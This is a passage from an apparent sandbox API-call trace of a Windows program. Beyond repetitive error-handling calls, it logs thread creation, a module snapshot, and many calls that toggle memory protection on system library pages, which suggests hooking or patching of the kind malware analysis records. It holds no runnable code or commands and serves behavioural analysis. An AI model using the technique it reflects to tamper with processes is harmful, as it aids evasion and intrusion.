(dwErrCode=0x0) [0131.188] GetLastError () returned 0x0 [0131.188] SetLastError (dwErrCode=0x0) [0131.188] GetLastError () returned 0x0 [0131.188] SetLastError (dwErrCode=0x0) [0131.251] GetLastError () returned 0x0 [0131.251] SetLastError (dwErrCode=0x0) [0131.251] GetLastError () returned 0x0 [0131.252] SetLastError (dwErrCode=0x0) [0131.252] GetLastError () returned 0x0 [0131.252] SetLastError (dwErrCode=0x0) [0131.252] GetLastError () returned 0x0 [0131.252] SetLastError (dwErrCode=0x0) [0131.333] GetLastError () returned 0x0 [0131.334] SetLastError (dwErrCode=0x0) [0131.334] GetLastError () returned 0x0 [0131.334] SetLastError (dwErrCode=0x0) [0131.334] GetLastError () returned 0x0 [0131.334] SetLastError (dwErrCode=0x0) [0131.334] GetLastError () returned 0x0 [0131.335] SetLastError (dwErrCode=0x0) [0131.417] GetLastError () returned 0x0 [0131.417] SetLastError (dwErrCode=0x0) [0131.417] GetLastError () returned 0x0 [0131.418] SetLastError (dwErrCode=0x0) [0131.418] GetLastError () returned 0x0 [0131.418] SetLastError (dwErrCode=0x0) [0131.418] GetLastError () returned 0x0 [0131.418] SetLastError (dwErrCode=0x0) [0131.418] GetLastError () returned 0x0 [0131.418] SetLastError (dwErrCode=0x0) [0131.505] GetLastError () returned 0x0 [0131.505] SetLastError (dwErrCode=0x0) [0131.505] GetLastError () returned 0x0 [0131.505] SetLastError (dwErrCode=0x0) [0131.505] GetLastError () returned 0x0 [0131.506] SetLastError (dwErrCode=0x0) [0131.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x523e84, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x28fe78 | out: lpThreadId=0x28fe78*=0xfdc) returned 0x120 [0131.616] GetLastError () returned 0x0 [0131.616] SetLastError (dwErrCode=0x0) [0131.616] GetLastError () returned 0x0 [0131.616] SetLastError (dwErrCode=0x0) [0131.616] GetLastError () returned 0x0 [0131.616] SetLastError (dwErrCode=0x0) [0131.617] GetLastError () returned 0x0 [0131.617] SetLastError (dwErrCode=0x0) [0131.711] GetLastError () returned 0x0 [0131.711] SetLastError (dwErrCode=0x0) [0131.711] GetLastError () returned 0x0 [0131.711] SetLastError (dwErrCode=0x0) [0131.796] GetLastError () returned 0x0 [0131.797] SetLastError (dwErrCode=0x0) [0131.883] GetLastError () returned 0x0 [0131.883] SetLastError (dwErrCode=0x0) [0131.883] GetLastError () returned 0x0 [0131.883] SetLastError (dwErrCode=0x0) [0131.883] GetLastError () returned 0x0 [0131.884] SetLastError (dwErrCode=0x0) [0131.884] GetLastError () returned 0x0 [0131.884] SetLastError (dwErrCode=0x0) [0131.884] GetLastError () returned 0x0 [0131.884] SetLastError (dwErrCode=0x0) [0131.970] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0131.970] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0131.971] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0131.971] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0131.971] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0131.972] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0131.972] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0131.973] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0131.973] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0131.974] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0131.974] GetLastError () returned 0x0 [0131.974] SetLastError (dwErrCode=0x0) [0131.974] GetLastError () returned 0x0 [0131.975] SetLastError (dwErrCode=0x0) [0131.975] GetLastError () returned 0x0 [0131.975] SetLastError (dwErrCode=0x0) [0131.975] GetCurrentProcessId () returned 0xfd4 [0131.975] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xfd4) returned 0x124 [0131.982] Module32First (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0131.983] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0131.984] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0131.985] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0131.985] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0131.993] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0131.993] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0132.005] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40170, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.006] GetCurrentProcess () returned 0xffffffff [0132.006] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40170, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.076] GetCurrentProcess () returned 0xffffffff [0132.076] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40248, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.076] GetCurrentProcess () returned 0xffffffff [0132.076] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40248, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.076] GetCurrentProcess () returned 0xffffffff [0132.077] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4024c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.077] GetCurrentProcess () returned 0xffffffff [0132.077] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4024c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.077] GetCurrentProcess () returned 0xffffffff [0132.077] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.078] GetCurrentProcess () returned 0xffffffff [0132.078] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.078] GetCurrentProcess () returned 0xffffffff [0132.078] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40264, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.079] GetCurrentProcess () returned 0xffffffff [0132.079] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40264, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.079] GetCurrentProcess () returned 0xffffffff [0132.079] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.080] GetCurrentProcess () returned 0xffffffff [0132.080] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.080] GetCurrentProcess () returned 0xffffffff [0132.080] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.080] GetCurrentProcess () returned 0xffffffff [0132.080] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.081] GetCurrentProcess () returned 0xffffffff [0132.081] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40640, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.081] GetCurrentProcess () returned 0xffffffff [0132.081] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40640, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.082] GetCurrentProcess () returned 0xffffffff [0132.082] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40644, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.082] GetCurrentProcess () returned 0xffffffff [0132.082] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40644, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.083] GetCurrentProcess () returned 0xffffffff [0132.083] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40728, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.083] GetCurrentProcess () returned 0xffffffff [0132.083] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40728, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.084] GetCurrentProcess () returned 0xffffffff [0132.084] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4072c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.084] GetCurrentProcess () returned 0xffffffff [0132.084] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4072c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.085] GetCurrentProcess () returned 0xffffffff [0132.085] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b407e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.085] GetCurrentProcess () returned 0xffffffff [0132.086] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b407e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.086] GetCurrentProcess () returned 0xffffffff [0132.086] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40874, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.087] GetCurrentProcess () returned 0xffffffff [0132.087] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40874, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.087] GetCurrentProcess () returned 0xffffffff [0132.087] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40880, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.087] GetCurrentProcess () returned 0xffffffff [0132.087] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40880, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.088] GetCurrentProcess () returned 0xffffffff [0132.088] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40934, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.088] GetCurrentProcess () returned 0xffffffff [0132.088] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40934, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.089] GetCurrentProcess () returned 0xffffffff [0132.089] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40aac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.089] GetCurrentProcess () returned 0xffffffff [0132.089] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40aac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.090] GetCurrentProcess () returned 0xffffffff [0132.090] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d14, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.090] GetCurrentProcess () returned 0xffffffff [0132.090] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d14, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.091] GetCurrentProcess () returned 0xffffffff [0132.091] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d18, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.091] GetCurrentProcess () returned 0xffffffff [0132.091] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d18, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.091] GetCurrentProcess () returned 0xffffffff [0132.092] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d1c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.092] GetCurrentProcess () returned 0xffffffff [0132.092] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d1c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.092] GetCurrentProcess () returned 0xffffffff [0132.092] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.093] GetCurrentProcess () returned 0xffffffff [0132.093] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.093] GetCurrentProcess () returned 0xffffffff [0132.093] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d70, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.094] GetCurrentProcess () returned 0xffffffff [0132.094] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d70, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.094] GetCurrentProcess () returned 0xffffffff [0132.094] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d7c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.095] GetCurrentProcess () returned 0xffffffff [0132.095] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d7c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.095] GetCurrentProcess () returned 0xffffffff [0132.095] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d80, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.096] GetCurrentProcess () returned 0xffffffff [0132.096] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d80, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.096] GetCurrentProcess () returned 0xffffffff [0132.096] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40f20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.096] GetCurrentProcess () returned 0xffffffff [0132.096] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40f20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.097] GetCurrentProcess () returned 0xffffffff [0132.097] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b411bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.097] GetCurrentProcess () returned 0xffffffff [0132.097] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b411bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.098] GetCurrentProcess () returned 0xffffffff [0132.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4138c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.098] GetCurrentProcess () returned 0xffffffff [0132.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4138c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.099] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.100] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.102] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599035c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.102] GetCurrentProcess () returned 0xffffffff [0132.102] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599035c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.103] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599036c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.103] GetCurrentProcess () returned 0xffffffff [0132.103] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599036c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.104] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599038c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.104] GetCurrentProcess () returned 0xffffffff [0132.104] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599038c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.105] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990390, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.105] GetCurrentProcess () returned 0xffffffff [0132.105] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990390, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 